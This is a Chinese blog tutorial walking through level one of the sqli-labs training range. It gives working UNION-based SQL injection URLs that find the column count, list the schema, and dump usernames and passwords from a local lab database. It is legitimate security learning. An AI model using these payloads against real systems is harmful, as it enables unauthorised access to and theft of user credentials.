sqli-lab靶场学习(一)——Less1

已于 2024-09-03 19:12:51 修改
阅读量429 收藏 10
点赞数 19
分类专栏: 安全 文章标签: 数据库 web安全
于 2024-09-03 18:53:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sadoshi/article/details/141866470
版权

前言

最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。

安装部署

网上很多关于安装部署的教程,很简单。本人是下载PHPStudy进行部署的。由于sqli-lab是用php5版本,现在很多一体化环境(我用wamp)的php都是7版本。我试过用github上有人修改sqli-lab适配php7版本,但是不清楚为什么报错的时候不会回显,这严重影响调试,所以还是换成PHPStudy,并且切换为php5版本进行部署就好了。

Less1

进入页面测试

输入http://localhost/sqli-labs/Less-1/进入第一关,地址和读者的部署情况有关。我是直接把sqli-lab解压放到apache的www目录下。

第一关会要求我们输入一个id作为传参,我们尝试id=1的情况:

之后尝试id=2、id=3……一直到id=13,发现为空:

证明id=13不存在。

确定闭合方式

我们可以看一下php的源码,打开Less-1的index.php

可以看到红色框起来的部分,我们传入的id直接拼接到sql查询语句中。这给我们看到一个sql注入的漏洞,就是通过单引号闭合变量。例如我们传参的时候带入一个单引号, 然后通过 -- 或者 # 忽略后续的语句,就形成了sql注入。

如果我们看不到源码,怎么知道它是单引号闭合呢?漏洞都得测试出来,我们可以尝试添加单引号、括号、双引号等等方式去测试闭合情况。比如这里如果传入id=1':

 因为多传了一个单引号,所以实际拼接的语句变成了:

SELECT * FROM users WHERE id='1'' LIMIT 0,1

这个语句多了个单引号,肯定报错了。

判断列数

接下来判断这个sql查询一共有多少列。输入:

http://localhost/sqli-labs/Less-1/?id=1' order by 1-- asd

这里通过单引号闭合,已经形成形成了注入。依次增加order by的数字,发现到order by 4的时候,出现报错:

 证明sql语句显示的只有三列。

联合注入

判断了列数后,我们看看能否通过联合查询回显数据,输入:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,2,3-- asd

可以看到第二、三列注入到“Your Login name”和“Your Password”的显示位置。我们输入id=13的原因在于之前判断了id=13是没有数据的,那回显的数据就会用union后面的数据了,如果输入id=1,那回显就是正常,而非我们想要注入的结果。这就是联合注入的关键!

查询具体的数据库名、表名、列名

联合注入成功后,其实离胜利已经很近了。接下来要把查询回显的列替换成查询数据库名、表名、列名。先查询数据库名:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,database(),3-- asd

通过回显可以看到目前查询的表在名为security的库中。

接下来查询security库中有什么表,通过information_schema的tables表可以找出来:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- asd

使用group_concat可以把全部表名显示出来。不过有时候回显的位置可能有长度限制或者显示限制,这种方式有时候不准确,所以更实在的方式是利用limit一个一个查出来:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 -- asd

当我们从limit 0,1一直到limit 3,1时,发现users这个表很可能就是包含用户名密码的表,我们要把它的数据查出来。查出来的前提是知道列名,通过information_schema的columns可查出:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- asd

通过回显看到username和password似乎就是我们想要找的两列,我们把它们查出来:

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(username),group_concat(password) from security.users -- asd

至此账号密码已经查出,sql注入成功!

小结

第一关是很简单的注入,不过其涉及到的内容很多,刚接触sql注入的朋友可能会有点懵。确实我刚开始也有点懵,因为一般做开发、做运维的朋友不会这样去写sql语句。当概念都了解了之后,就会觉得其实也就这么回事,Less-1没什么高大上的。另外注意这个靶场环境一定要搞好,否则很可能出现输入同样的查询,得出来不一样的结果,严重影响学习和理解效率。

sadoshi
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
打穿sqli-labs靶场——Day6 (less-8)手工布尔盲注
qq_45741871的博客
04-18 494
打穿sqli-labs靶场day6——less-8 手工布尔盲注
Sqli-labs靶场详细攻略Less 6-10
qq_41755084的博客
10-10 877
与第五关相似,只是闭合的单引号换为了双引号。
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 1015
这一关还是进行宽字节注入,与上一关的区别在于使用了post方法进行传递。先试一下上一关的注入代码。因为这一关是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
sqli-lab靶场通关
qq_55202378的博客
10-09 421
sqli-lab SQL注入
sql学习以及sqli-lab靶场练习
RealIiikun的博客
03-07 636
sqlilab靶场练习
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1560
Sqli-labs靶场详细攻略
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1382
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1480
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1807
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
华为云征文|Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
最新发布
Arya的博客,专注后端领域
09-03 612
4核12G-100G-3M规格的Flexus X实例使用测评第3弹:Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
mysql-day02
m0_64370841的博客
08-29 2249
【代码】mysql-day02。
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1757
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 1272
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1783
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
编译原理简介
m0_52796585的博客
09-01 927
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 749
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)
简单发点工作中用到的,或者记录下小知识点
09-03 944
按时间 年月日条件分组,筛选数据,统计数据,聚合查询 打印出mongo的SQL语句
CAS单点登录说明文档
大强博客
09-01 185
CAS单点登录说明文档
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值